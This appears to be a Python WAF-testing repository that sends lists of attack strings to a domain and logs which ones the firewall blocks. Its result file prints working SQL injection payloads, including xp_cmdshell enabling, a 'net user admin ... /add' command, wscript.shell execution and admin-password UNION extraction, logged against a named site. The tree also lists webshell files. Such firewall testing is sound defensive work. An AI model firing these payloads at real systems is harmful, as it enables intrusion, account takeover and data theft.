├── .gitattributes ├── .gitignore ├── exploit.py ├── lib ├── __init__.py ├── logging.py └── request_util.py ├── modules ├── COMMANDI_TEST.py ├── DOWNLOAD_TEST.py ├── LFI_TEST.py ├── SPIDER_TEST.py ├── SQLI_TEST.py ├── UPLOAD_CONTENT_TEST.py ├── UPLOAD_EXT_TEST.py ├── XSS_TEST.py └── __init__.py ├── readme.txt ├── result └── sqli_result.txt └── usecase ├── commandi.usecase ├── download.usecase ├── lfi.usecase ├── spider.usecase ├── sqli.usecase ├── upload_content ├── a.php ├── b.asp ├── c.aspx └── webshell │ ├── 404.php │ └── phpspy.php └── upload_ext.usecase /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | 7 | # Standard to msysgit 8 | *.doc diff=astextplain 9 | *.DOC diff=astextplain 10 | *.docx diff=astextplain 11 | *.DOCX diff=astextplain 12 | *.dot diff=astextplain 13 | *.DOT diff=astextplain 14 | *.pdf diff=astextplain 15 | *.PDF diff=astextplain 16 | *.rtf diff=astextplain 17 | *.RTF diff=astextplain 18 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Windows image file caches 2 | Thumbs.db 3 | ehthumbs.db 4 | 5 | # Folder config file 6 | Desktop.ini 7 | 8 | # Recycle Bin used on file shares 9 | $RECYCLE.BIN/ 10 | 11 | # Windows Installer files 12 | *.cab 13 | *.msi 14 | *.msm 15 | *.msp 16 | 17 | # Windows shortcuts 18 | *.lnk 19 | 20 | # ========================= 21 | # Operating System Files 22 | # ========================= 23 | 24 | # OSX 25 | # ========================= 26 | 27 | .DS_Store 28 | .AppleDouble 29 | .LSOverride 30 | 31 | # Thumbnails 32 | ._* 33 | 34 | # Files that might appear on external disk 35 | .Spotlight-V100 36 | .Trashes 37 | 38 | # Directories potentially created on remote AFP share 39 | .AppleDB 40 | .AppleDesktop 41 | 
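Network Trash Folder
Temporary Items
.apdisk
--------------------------------------------------------------------------------
/exploit.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# coding:utf-8
"""Command-line entry point of WAF-Tester.

Parses ``-t type -m method -d domain [-u usecase]`` and dispatches to the
matching ``modules.*_TEST`` function, which sends each entry of the usecase
file to ``domain`` and records the HTTP status in a file under ``result/``.
"""

import getopt,sys
from modules.SQLI_TEST import *
from modules.XSS_TEST import *
from modules.COMMANDI_TEST import *
from modules.SPIDER_TEST import *
from modules.LFI_TEST import *
from modules.DOWNLOAD_TEST import *
from modules.UPLOAD_EXT_TEST import *
from modules.UPLOAD_CONTENT_TEST import *

def printSyntax():
    """Print the usage banner (the same text appears in readme.txt)."""
    print('''
#=====================================
#-t type : test type (eg:sqli,xss,commandi,lfi,upload_ext,upload_content,download,spider)
#-m method: test method (eg:get,post)
#-d domain : test domain (eg:http://www.xxx.com/)
#-u usecase : test usecase
#Usage:
./exploit.py -t -m -d [-u ]
./exploit.py -t sqli -m get -d http://www.xxoo.com -u usecase/sqli.usecase
#=====================================
''')

if __name__=='__main__':
    # -t, -m and -d are all required: six arguments plus the script name.
    if len(sys.argv) < 7:
        printSyntax()
        sys.exit(1)
    else:
        try:
            opts,args = getopt.getopt(sys.argv[1:],"t:m:d:u:")
        except getopt.GetoptError:
            # Only a malformed option line is a usage error; anything else should surface.
            printSyntax()
            sys.exit(1)

        # `type` shadows the builtin; kept because the dispatch below refers to it by this name.
        type = None
        method = None
        domain = None
        usecase = None

        for opt,arg in opts:
            if opt == '-t':
                type = arg
            elif opt == '-m':
                method = arg
            elif opt == '-d':
                domain = arg
            elif opt == '-u':
                usecase = arg
            else:
                print("Unknown options!")
                printSyntax()
                sys.exit(1)

        # Every module expects the literal lower-case strings "get" or "post".
        if method != "get" and method != "post":
            print("Unknown method!")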
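# (exploit.py, continued: still inside the ``else`` branch of the argument-count check above)
            printSyntax()
            sys.exit(1)

        # Each type falls back to its default usecase file when -u was not given and
        # then hands off to its module.  The download test only works with GET and the
        # two upload tests only with POST, so the method is re-checked for those.
        if type == "sqli":
            if usecase is None:
                usecase = "usecase/sqli.usecase"
            SQLI_TEST(domain,method,usecase)
        elif type == "xss":
            # NOTE(review): the repository tree shown on this page has no usecase/xss.usecase,
            # so "-t xss" without -u fails when XSS_TEST opens this default path.
            if usecase is None:
                usecase = "usecase/xss.usecase"
            XSS_TEST(domain,method,usecase)
        elif type == "lfi":
            if usecase is None:
                usecase = "usecase/lfi.usecase"
            LFI_TEST(domain,method,usecase)
        elif type == "commandi":
            if usecase is None:
                usecase = "usecase/commandi.usecase"
            COMMANDI_TEST(domain,method,usecase)
        elif type =="download":
            if usecase is None:
                usecase = "usecase/download.usecase"
            if method == "post":
                print("download method must be GET!")
                printSyntax()
                sys.exit(1)
            DOWNLOAD_TEST(domain,method,usecase)
        elif type == "upload_ext":
            if usecase is None:
                usecase = "usecase/upload_ext.usecase"
            if method == "get":
                print("upload method must be POST!")
                printSyntax()
                sys.exit(1)
            UPLOAD_EXT_TEST(domain,method,usecase)
        elif type == "upload_content":
            if usecase is None:
                # A directory, not a file: UPLOAD_CONTENT_TEST walks it recursively.
                usecase = "usecase/upload_content"
            if method == "get":
                print("upload method must be POST!")
                printSyntax()
                sys.exit(1)
            UPLOAD_CONTENT_TEST(domain,method,usecase)
        elif type == "spider":
            if usecase is None:
                usecase = "usecase/spider.usecase"
            SPIDER_TEST(domain,method,usecase)
        else:
            # Exit non-zero like the other usage errors instead of silently returning 0.
            print("Unknown type!")
            printSyntax()
            sys.exit(1)
--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hongxs/WAF-Tester2/b2535eb2dd94ae9a093cd9131cd2c510e9b5f30d/lib/__init__.py
--------------------------------------------------------------------------------
/lib/logging.py:
--------------------------------------------------------------------------------
#!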
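/usr/bin/env python
# coding:utf-8
from lib.request_util import *
import time

class logging:
    """Minimal result-file writer shared by the modules.*_TEST runners.

    The constructor opens `logfile` for writing (truncating an existing file)
    and writes a fixed banner.  The project name ``logging`` is kept even
    though it shadows the standard-library module of that name inside this
    package.
    """
    def __init__(self,logfile):
        self.logfile = logfile
        self.f = open(self.logfile,"w")
        self.f.write("+++++++++++[The result]+++++++++++\n\n")

    def __enter__(self):
        """Allow ``with logging(path) as log:``; the file is closed on exit."""
        return self

    def __exit__(self, exc_type, exc, tb):
        self.close()
        return False

    def writelog(self,message):
        """Write `message` verbatim (no newline is added); a failed write is ignored."""
        try:
            self.f.write(message)
        except IOError:
            pass

    def close(self):
        self.f.close()
--------------------------------------------------------------------------------
/lib/request_util.py:
--------------------------------------------------------------------------------
#! /usr/bin/env python
# coding:utf-8

import urllib,urllib2,socket
import random,types
# Module-level side effect: every socket opened by this process gets a 10 s timeout.
socket.setdefaulttimeout(10)

def send_req_get(url,params=None,headers=None):
    """Issue a GET and return ``(url, status)``.

    A dict `params` is urlencoded onto the query string (and the returned
    `url` includes it).  `status` is the HTTP code on success or on an
    HTTPError; any other failure (URLError, socket timeout, ...) prints the
    exception and yields "[ERROR]", matching send_req_post() instead of
    leaving `res` unbound.
    """
    if headers is None:
        headers = {}
    if params:
        url = "%s?%s" % (url, urllib.urlencode(params))
    req = urllib2.Request(url,headers=headers)
    try:
        response = urllib2.urlopen(req)
        try:
            res = response.getcode()
        finally:
            response.close()
    except urllib2.HTTPError as e:
        res = e.code
    except Exception as e:
        print(e)
        res = "[ERROR]"
    return url,res

def send_req_post(url,params=None,headers=None):
    """Issue a POST and return ``(url, status)``.

    A dict `params` is urlencoded; any other truthy value is sent as the raw
    body (the upload tests pass a pre-built multipart string).  `status` is
    the HTTP code, or "[ERROR]" when the request failed without an HTTP reply.
    """
    if headers is None:
        headers = {}
    if params:
        if isinstance(params, dict):
            params = urllib.urlencode(params)
        req = urllib2.Request(url,data=params,headers=headers)
    else:
        req = urllib2.Request(url,headers=headers)
    try:
        f = urllib2.urlopen(req)
        try:
            res = f.getcode()
        finally:
            f.close()
    except urllib2.HTTPError as e:
        res = e.code
        print(e)
    except Exception as e:
        print(e)
        res = "[ERROR]"
    return url,res

def randomIP():
    """Return a random dotted-quad string; check_usecase() sends it as X-Forwarded-For."""
    clientip = ""
    for i in range(3):
        temp = random.randint(0,255)
        clientip += str(temp) + "."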
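# (lib/request_util.py, continued: last octet and return of randomIP())
    clientip = clientip + str(random.randint(0,255))
    return clientip

def check_usecase(uri,method,params,req_headers,host):
    """Send one usecase to ``host + uri`` and return ``(url, status)``.

    When `req_headers` is None a fixed browser User-Agent is used; otherwise
    the caller's headers are copied (not mutated).  In both cases the
    X-Forwarded-For header is set to a random address from randomIP().  An
    unknown `method` yields ``(url, 503)`` so callers can index the result
    exactly like the tuples returned by the GET/POST helpers.
    """
    url = host + uri
    clientip = randomIP()
    if req_headers is None:
        req_headers={"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6",
                     "X-Forwarded-For": clientip}
    else:
        # Copy so the caller's dict is left untouched; the header name now matches the
        # default branch above (this branch previously spelled it 'X-Forward-For').
        req_headers = dict(req_headers)
        req_headers['X-Forwarded-For'] = clientip
    if method == "get":
        res = send_req_get(url,params,req_headers)
    elif method == "post":
        res = send_req_post(url,params,req_headers)
    else:
        res = (url, 503)
    return res
--------------------------------------------------------------------------------
/modules/COMMANDI_TEST.py:
--------------------------------------------------------------------------------
#! /usr/bin/env python
# coding:utf-8
from lib.request_util import *
from lib.logging import *
import time

def check_commandi_usecase(info,domain,method,i,logging_file):
    """Send usecase line `i` (`info`) as the ``id`` parameter of /default.aspx and log the outcome.

    HTTP 400 is recorded as "[OK]" (treated as blocked); any other status is
    printed in red and recorded as "[!!]".  NOTE: readme.txt describes the
    blocked status as 403, so confirm which code the WAF under test returns.
    """
    print("----------------")
    res = check_usecase("/default.aspx",method,{"id":info},None,domain)
    print(res[0])
    logging_file.writelog("-------------\n")
    logging_file.writelog(res[0]+"\n" )
    if res[1] == 400:
        print("%s : %s  usecase: %s" % (i, res[1], info))
        logging_file.writelog("[OK] "+ str(i) +" : "+ str(res[1]) +" usecase:"+ info +"\n" )
    else:
        # ANSI escape: bold red on black for a usecase that was not blocked.
        print('\033[1;31;40m')
        print("%s : %s  usecase: %s" % (i, res[1], info))
        print('\033[0m')
        logging_file.writelog("[!!] "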
"+ str(i) +" : "+ str(res[1]) +" usecase:"+info+"\n" ) 22 | 23 | def COMMANDI_TEST(domain,method,usecase): 24 | commandi_file = open(usecase) 25 | file_content_lines = commandi_file.readlines() 26 | commandi_file.close() 27 | i = 0 28 | logging_file = logging("result/commandi_result.txt") 29 | for line in file_content_lines: 30 | info = line.strip() 31 | i+=1 32 | if info != "": 33 | check_commandi_usecase(info,domain,method,i,logging_file) 34 | #time.sleep(5) 35 | logging_file.close() 36 | -------------------------------------------------------------------------------- /modules/DOWNLOAD_TEST.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # coding:utf-8 3 | from lib.request_util import * 4 | from lib.logging import * 5 | import time 6 | 7 | def check_download_usecase(info,domain,method,i,logging_file): 8 | print "----------------" 9 | # print i,":",info 10 | info = "/"+info 11 | res = check_usecase(info,method,None,None,domain) 12 | print res[0] 13 | logging_file.writelog("-------------\n") 14 | logging_file.writelog(res[0]+"\n" ) 15 | if res[1] == 400: 16 | print i,":",res[1]," usecase:",info 17 | logging_file.writelog("[OK] "+ str(i) +" : "+ str(res[1]) +" usecase:"+ info +"\n" ) 18 | else: 19 | print '\033[1;31;40m' 20 | print i,":",res[1]," usecase:",info 21 | print '\033[0m' 22 | logging_file.writelog("[!!] 
"+ str(i) +" : "+ str(res[1]) +" usecase:"+info+"\n" ) 23 | 24 | def DOWNLOAD_TEST(domain,method,usecase): 25 | download_file = open(usecase) 26 | file_content_lines = download_file.readlines() 27 | download_file.close() 28 | i = 0 29 | logging_file = logging("result/download_result.txt") 30 | for line in file_content_lines: 31 | info = line.strip() 32 | i+=1 33 | if info != "": 34 | check_download_usecase(info,domain,method,i,logging_file) 35 | # time.sleep(5) 36 | logging_file.close() 37 | -------------------------------------------------------------------------------- /modules/LFI_TEST.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # coding:utf-8 3 | from lib.request_util import * 4 | from lib.logging import * 5 | import time 6 | 7 | def check_lfi_usecase(info,domain,method,i,logging_file): 8 | print "----------------" 9 | # print i,":",info 10 | res = check_usecase("/default.aspx",method,{"id":info},None,domain) 11 | print res[0] 12 | logging_file.writelog("-------------\n") 13 | logging_file.writelog(res[0]+"\n" ) 14 | if res[1] == 400: 15 | print i,":",res[1]," usecase:",info 16 | logging_file.writelog("[OK] "+ str(i) +" : "+ str(res[1]) +" usecase:"+ info +"\n" ) 17 | else: 18 | print '\033[1;31;40m' 19 | print i,":",res[1]," usecase:",info 20 | print '\033[0m' 21 | logging_file.writelog("[!!] 
"+ str(i) +" : "+ str(res[1]) +" usecase:"+info+"\n" ) 22 | 23 | def LFI_TEST(domain,method,usecase): 24 | lfi_file = open(usecase) 25 | file_content_lines = lfi_file.readlines() 26 | lfi_file.close() 27 | i = 0 28 | logging_file = logging("result/lfi_result.txt") 29 | for line in file_content_lines: 30 | info = line.strip() 31 | i+=1 32 | if info != "": 33 | check_lfi_usecase(info,domain,method,i,logging_file) 34 | #time.sleep(5) 35 | logging_file.close() 36 | -------------------------------------------------------------------------------- /modules/SPIDER_TEST.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # coding:utf-8 3 | from lib.request_util import * 4 | from lib.logging import * 5 | import time 6 | 7 | def check_spider_usecase(info,domain,method,i,logging_file): 8 | print "----------------" 9 | # print i,":",info 10 | res = check_usecase("/default.aspx",method,None,{"User-Agent":info},domain) 11 | print res[0] 12 | logging_file.writelog("-------------\n") 13 | logging_file.writelog(res[0]+"\n" ) 14 | if res[1] == 400: 15 | print i,":",res[1]," usecase:",info 16 | logging_file.writelog("[OK] "+ str(i) +" : "+ str(res[1]) +" usecase:"+ info +"\n" ) 17 | else: 18 | print '\033[1;31;40m' 19 | print i,":",res[1]," usecase:",info 20 | print '\033[0m' 21 | logging_file.writelog("[!!] 
"+ str(i) +" : "+ str(res[1]) +" usecase:"+info+"\n" ) 22 | 23 | def SPIDER_TEST(domain,method,usecase): 24 | spider_file = open(usecase) 25 | file_content_lines = spider_file.readlines() 26 | spider_file.close() 27 | i = 0 28 | logging_file = logging("result/spider_result.txt") 29 | for line in file_content_lines: 30 | info = line.strip() 31 | i+=1 32 | if info != "": 33 | check_spider_usecase(info,domain,method,i,logging_file) 34 | # time.sleep(5) 35 | logging_file.close() 36 | -------------------------------------------------------------------------------- /modules/SQLI_TEST.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # coding:utf-8 3 | from lib.request_util import * 4 | from lib.logging import * 5 | import time 6 | 7 | def check_sqli_usecase(info,domain,method,i,logging_file): 8 | print "----------------" 9 | # print i,":",info 10 | res = check_usecase("/default.aspx",method,{"id":info},None,domain) 11 | print res[0] 12 | logging_file.writelog("-------------\n") 13 | logging_file.writelog(res[0]+"\n" ) 14 | if res[1] == 400: 15 | print i,":",res[1]," usecase:",info 16 | logging_file.writelog("[OK] "+ str(i) +" : "+ str(res[1]) +" usecase:"+ info +"\n" ) 17 | else: 18 | print '\033[1;31;40m' 19 | print i,":",res[1]," usecase:",info 20 | print '\033[0m' 21 | logging_file.writelog("[!!] 
"+ str(i) +" : "+ str(res[1]) +" usecase:"+info+"\n" ) 22 | 23 | def SQLI_TEST(domain,method,usecase): 24 | sqli_file = open(usecase) 25 | file_content_lines = sqli_file.readlines() 26 | sqli_file.close() 27 | i = 0 28 | method = method 29 | logging_file = logging("result/sqli_result.txt") 30 | for line in file_content_lines: 31 | info = line.strip() 32 | i+=1 33 | if info != "": 34 | check_sqli_usecase(info,domain,method,i,logging_file) 35 | #time.sleep(5) 36 | logging_file.close() 37 | -------------------------------------------------------------------------------- /modules/UPLOAD_CONTENT_TEST.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # coding:utf-8 3 | from lib.request_util import * 4 | from lib.logging import * 5 | import time,os,sys 6 | 7 | i = 0 8 | def generate_data(boundary,filepath): 9 | data = [] 10 | data.append('--%s' % boundary) 11 | 12 | data.append('Content-Disposition: form-data; name="%s"\r\n' % 'username') 13 | data.append('jack') 14 | data.append('--%s' % boundary) 15 | 16 | data.append('Content-Disposition: form-data; name="%s"\r\n' % 'mobile') 17 | data.append('13800138000') 18 | data.append('--%s' % boundary) 19 | 20 | try: 21 | fr=open(filepath,'rb') 22 | except Exception ,e: 23 | print "Open file ERROR!" 
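# (modules/UPLOAD_CONTENT_TEST.py, continued: except clause of generate_data())
        print(e)
        # Re-raise: the code below reads from `fr`, which was never bound when open()
        # failed, so continuing would only turn the real error into a NameError.
        raise
    data.append('Content-Disposition: form-data; name="profile"; filename="%s"' % 'test.jpg')
    data.append('Content-Type: %s\r\n' % 'image/jpeg')
    data.append('testtesttest!')
    try:
        data.append(fr.read())
    finally:
        fr.close()
    data.append('--%s--\r\n' % boundary)

    return data


def check_upload_usecase(filepath,domain,method,i,logging_file):
    """POST the file at `filepath` as a multipart upload to /search123.php and log the outcome.

    HTTP 400 is recorded as "[OK]" (treated as blocked); any other status is
    printed in red and recorded as "[!!]".  A request that raises is reported
    with status "[ERROR]" instead of leaving `res` unbound.
    """
    print("----------------")
    # Millisecond timestamp keeps the boundary unique per request.
    boundary = '----------%s' % hex(int(time.time() * 1000))
    data = generate_data(boundary,filepath)
    upload_data = '\r\n'.join(data)
    req_headers = {"Content-Type": "multipart/form-data; boundary=%s" % boundary,
                   "User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6"}
    try:
        res = check_usecase("/search123.php",method,upload_data,req_headers,domain)
    except Exception as e:
        print("ERROR!")
        print(e)
        # Same (url, status) shape check_usecase() returns, so the reporting below still works.
        res = (domain + "/search123.php", "[ERROR]")
    print(res[0])
    logging_file.writelog("-------------\n")
    logging_file.writelog(res[0]+"\n" )
    if res[1] == 400:
        print("%s : %s  usecase: %s" % (i, res[1], filepath))
        logging_file.writelog("[OK] "+ str(i) +" : "+ str(res[1]) +" usecase:"+ filepath +"\n" )
    else:
        # ANSI escape: bold red on black for a usecase that was not blocked.
        print('\033[1;31;40m')
        print("%s : %s  usecase: %s" % (i, res[1], filepath))
        print('\033[0m')
        logging_file.writelog("[!!] "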
"+ str(i) +" : "+ str(res[1]) +" usecase:"+ filepath +"\n" ) 62 | 63 | def UPLOAD_CONTENT_TEST(domain,method,usecase): 64 | # upload_file = open(usecase) 65 | # file_content_lines = upload_file.readlines() 66 | # upload_file.close() 67 | global i 68 | oldpath = usecase 69 | filelist = os.listdir(oldpath) 70 | logging_file = logging("result/upload_content_result.txt") 71 | for name in filelist: 72 | newpath = os.path.join(oldpath,name) 73 | if os.path.isdir(newpath): 74 | usecase = newpath 75 | UPLOAD_CONTENT_TEST(domain,method,usecase) 76 | usecase = oldpath 77 | else: 78 | i = i + 1 79 | check_upload_usecase(newpath,domain,method,i,logging_file) 80 | #time.sleep(5) 81 | logging_file.close() 82 | -------------------------------------------------------------------------------- /modules/UPLOAD_EXT_TEST.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # coding:utf-8 3 | from lib.request_util import * 4 | from lib.logging import * 5 | import time 6 | 7 | def generate_data(boundary,filename): 8 | data = [] 9 | data.append('--%s' % boundary) 10 | 11 | data.append('Content-Disposition: form-data; name="%s"\r\n' % 'username') 12 | data.append('jack') 13 | data.append('--%s' % boundary) 14 | 15 | data.append('Content-Disposition: form-data; name="%s"\r\n' % 'mobile') 16 | data.append('13800138000') 17 | data.append('--%s' % boundary) 18 | 19 | # fr=open(r'/var/qr/b.png','rb') 20 | data.append('Content-Disposition: form-data; name="profile"; filename="%s"' % filename) 21 | data.append('Content-Type: %s\r\n' % 'image/png') 22 | data.append('testtesttest!') 23 | # data.append(fr.read()) 24 | # fr.close() 25 | data.append('--%s--\r\n' % boundary) 26 | 27 | return data 28 | 29 | 30 | def check_upload_usecase(info,domain,method,i,logging_file): 31 | print "----------------" 32 | # print i,":",info 33 | boundary = '----------%s' % hex(int(time.time() * 1000)) 34 | data = generate_data(boundary,info) 35 | 
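# (modules/UPLOAD_EXT_TEST.py, continued: body of check_upload_usecase())
    upload_data = '\r\n'.join(data)
    req_headers = {"Content-Type": "multipart/form-data; boundary=%s" % boundary,
                   "User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6"}
    res = check_usecase("/search.php",method,upload_data,req_headers,domain)
    print(res[0])
    logging_file.writelog("-------------\n")
    logging_file.writelog(res[0]+"\n" )
    if res[1] == 400:
        print("%s : %s  usecase: %s" % (i, res[1], info))
        logging_file.writelog("[OK] "+ str(i) +" : "+ str(res[1]) +" usecase:"+ info +"\n" )
    else:
        # ANSI escape: bold red on black for a usecase that was not blocked.
        print('\033[1;31;40m')
        print("%s : %s  usecase: %s" % (i, res[1], info))
        print('\033[0m')
        logging_file.writelog("[!!] "+ str(i) +" : "+ str(res[1]) +" usecase:"+info+"\n" )

def UPLOAD_EXT_TEST(domain,method,usecase):
    """Upload one file per non-empty line of the `usecase` file, using the line as the file name.

    `i` is the 1-based line number (blank lines still count but are skipped).
    Results go to result/upload_ext_result.txt, which is closed even if a
    request raises.
    """
    with open(usecase) as upload_file:
        file_content_lines = upload_file.readlines()
    logging_file = logging("result/upload_ext_result.txt")
    try:
        for i, line in enumerate(file_content_lines, 1):
            info = line.strip()
            if info != "":
                check_upload_usecase(info,domain,method,i,logging_file)
                #time.sleep(5)  # readme.txt mentions a 5 s pause per request; disabled here
    finally:
        logging_file.close()
--------------------------------------------------------------------------------
/modules/XSS_TEST.py:
--------------------------------------------------------------------------------
#!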
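/usr/bin/env python
# coding:utf-8
from lib.request_util import *
from lib.logging import *
import time

def check_xss_usecase(info,domain,method,i,logging_file):
    """Send usecase line `i` (`info`) as the ``id`` parameter of /default.aspx and log the outcome.

    HTTP 400 is recorded as "[OK]" (treated as blocked); any other status is
    printed in red and recorded as "[!!]".  NOTE: readme.txt describes the
    blocked status as 403, so confirm which code the WAF under test returns.
    """
    print("----------------")
    res = check_usecase("/default.aspx",method,{"id":info},None,domain)
    print(res[0])
    logging_file.writelog("-------------\n")
    logging_file.writelog(res[0]+"\n" )
    if res[1] == 400:
        print("%s : %s  usecase: %s" % (i, res[1], info))
        logging_file.writelog("[OK] "+ str(i) +" : "+ str(res[1]) +" usecase:"+ info +"\n" )
    else:
        # ANSI escape: bold red on black for a usecase that was not blocked.
        print('\033[1;31;40m')
        print("%s : %s  usecase: %s" % (i, res[1], info))
        print('\033[0m')
        logging_file.writelog("[!!] "+ str(i) +" : "+ str(res[1]) +" usecase:"+info+"\n" )

def XSS_TEST(domain,method,usecase):
    """Run every non-empty line of the `usecase` file as a cross-site-scripting probe.

    `i` is the 1-based line number (blank lines still count but are skipped).
    Results go to result/xss_result.txt, which is closed even if a request raises.
    """
    with open(usecase) as xss_file:
        file_content_lines = xss_file.readlines()
    logging_file = logging("result/xss_result.txt")
    try:
        for i, line in enumerate(file_content_lines, 1):
            info = line.strip()
            if info != "":
                check_xss_usecase(info,domain,method,i,logging_file)
                #time.sleep(5)  # readme.txt mentions a 5 s pause per request; disabled here
    finally:
        logging_file.close()
--------------------------------------------------------------------------------
/modules/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hongxs/WAF-Tester2/b2535eb2dd94ae9a093cd9131cd2c510e9b5f30d/modules/__init__.py
--------------------------------------------------------------------------------
/readme.txt:
--------------------------------------------------------------------------------
WAF-Tester

========


WAF 测试工具 --- 用例测试


直接运行./exploit.py,运行结果返回403为被WAF拦截,否则为漏报!结果自动保存在result目录下!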
10 | 11 | #===================================== 12 | 13 | #-t type : test type (eg:sqli,xss,commandi,lfi,upload_ext,upload_content,download,spider) 14 | 15 | #-m method: test method (eg:get,post) 16 | 17 | #-d domain : test domain (eg:http://www.xxx.com/) 18 | 19 | #-u usecase : test usecase 20 | 21 | #Usage: 22 | 23 | ./exploit.py -t -m -d [-u ] 24 | 25 | ./exploit.py -t sqli -m get -d http://www.xxoo.com -u usecase/sqli.usecase 26 | 27 | #===================================== 28 | 29 | 30 | 如果没有指定 -u [用例路径],就采用默认的用例。如自己指定需要测试的用例,就会采用指定的用例。 31 | 32 | 33 | 34 | 类型说明: 35 | sqli 检测SQL注入 36 | xss 检测跨站脚本攻击 37 | commandi 检测命令注入攻击 38 | lfi 检测本地文件包含/目录遍历攻击 39 | download 检测非法文件下载 40 | spider 检测恶意爬虫 41 | upload_ext 检测上传文件的后缀名 42 | upload_content 检测上传文件的内容 ---默认用例:usecase/upload_content,其中用例以文件为单位,放入文件夹可以递归 43 | 44 | 45 | 每发个请求,睡眠5秒! 46 | 由于用例是经验整理的,可能有的欠妥! -------------------------------------------------------------------------------- /result/sqli_result.txt: -------------------------------------------------------------------------------- 1 | +++++++++++[The result]+++++++++++ 2 | 3 | ------------- 4 | http://www.zoosnet.net/default.aspx 5 | [!!] 1 : 200 usecase:1 and 1=1 6 | ------------- 7 | http://www.zoosnet.net/default.aspx 8 | [OK] 2 : 400 usecase:1 or 'ab'='ab 9 | ------------- 10 | http://www.zoosnet.net/default.aspx 11 | [!!] 3 : 200 usecase:1 and ord(mid(version(),1,1))>51/* 12 | ------------- 13 | http://www.zoosnet.net/default.aspx 14 | [!!] 4 : 200 usecase:1 order by 10-- 15 | ------------- 16 | http://www.zoosnet.net/default.aspx 17 | [OK] 5 : 400 usecase:1 ;select BENCHMARK(100000,SHA1('true')), false);-- 18 | ------------- 19 | http://www.zoosnet.net/default.aspx 20 | [!!] 6 : 200 usecase:1 having 1=1 21 | ------------- 22 | http://www.zoosnet.net/default.aspx 23 | [!!] 7 : 200 usecase:1 GROUP BY colume_got having 1=1 24 | ------------- 25 | http://www.zoosnet.net/default.aspx 26 | [!!] 
8 : 200 usecase:1 ;create table cmd(a text) 27 | ------------- 28 | http://www.zoosnet.net/default.aspx 29 | [!!] 9 : 200 usecase:1 "UNION%20%28SELECT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%28admin%29%29 30 | ------------- 31 | http://www.zoosnet.net/default.aspx 32 | [!!] 10 : 200 usecase:1 =-9%0Aunion%0Aselect 1,2,3,4" 33 | ------------- 34 | http://www.zoosnet.net/default.aspx 35 | [OK] 11 : 400 usecase:1 null union all select 1,user(),3,4,5/* 36 | ------------- 37 | http://www.zoosnet.net/default.aspx 38 | [OK] 12 : 400 usecase:1 ;insert into user(username,password) values('xxxx',' xxxx'),('dddd','dddd')/* '); 39 | ------------- 40 | http://www.zoosnet.net/default.aspx 41 | [!!] 13 : 200 usecase:1 42 | ------------- 43 | http://www.zoosnet.net/default.aspx 44 | [!!] 14 : 200 usecase:1 and 1=(Select IS_MEMBER('db_owner')) 45 | ------------- 46 | http://www.zoosnet.net/default.aspx 47 | [OK] 15 : 400 usecase:1 And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- 48 | ------------- 49 | http://www.zoosnet.net/default.aspx 50 | [!!] 16 : 200 usecase:1 and 1= (Select HAS_DBACCESS('master')) 51 | ------------- 52 | http://www.zoosnet.net/default.aspx 53 | [OK] 17 : 400 usecase:1 And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 -- 54 | ------------- 55 | http://www.zoosnet.net/default.aspx 56 | [!!] 18 : 200 usecase:1 and char(124)%2Buser%2Bchar(124)=0 57 | ------------- 58 | http://www.zoosnet.net/default.aspx 59 | [!!] 19 : 200 usecase:1 and user>0 60 | ------------- 61 | http://www.zoosnet.net/default.aspx 62 | [!!] 20 : 200 usecase:1 and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 63 | ------------- 64 | http://www.zoosnet.net/default.aspx 65 | [!!] 
21 : 200 usecase:1 And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 -- 66 | ------------- 67 | http://www.zoosnet.net/default.aspx 68 | [OK] 22 : 400 usecase:1 and exists (select * from sysobjects);-- 69 | ------------- 70 | http://www.zoosnet.net/default.aspx 71 | [OK] 23 : 400 usecase:1 ;declare @d int;-- 72 | ------------- 73 | http://www.zoosnet.net/default.aspx 74 | [OK] 24 : 400 usecase:1 ;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';-- 75 | ------------- 76 | http://www.zoosnet.net/default.aspx 77 | [OK] 25 : 400 usecase:1 select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') 78 | ------------- 79 | http://www.zoosnet.net/default.aspx 80 | [!!] 26 : 200 usecase:1 exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 81 | ------------- 82 | http://www.zoosnet.net/default.aspx 83 | [!!] 27 : 200 usecase:1 select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell 84 | ------------- 85 | http://www.zoosnet.net/default.aspx 86 | [!!] 28 : 200 usecase:1 ("cmd.exe /c net user admin admin1234 /add")') 87 | ------------- 88 | http://www.zoosnet.net/default.aspx 89 | [OK] 29 : 400 usecase:1 ";DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C: 90 | ------------- 91 | http://www.zoosnet.net/default.aspx 92 